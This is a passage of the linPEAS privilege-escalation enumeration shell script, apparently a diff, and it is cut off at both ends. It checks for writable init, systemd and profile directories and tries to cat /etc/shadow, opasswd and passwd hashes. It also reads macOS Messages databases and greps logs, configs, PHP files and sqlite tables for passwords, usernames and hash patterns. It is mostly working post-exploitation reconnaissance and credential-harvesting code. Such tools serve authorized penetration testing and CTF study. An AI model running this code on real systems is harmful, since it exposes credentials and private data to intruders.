"/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; - fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - fi - done - echo "" - fi - fi - done - fi - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" - fi - - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" - - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" - - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" - - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done - echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - ##-- IF) Passwords files in home - print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" - - if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Finding passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) Find possible files with passwords - print_2title "Finding possible password variables inside key folders (limit 140)" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - 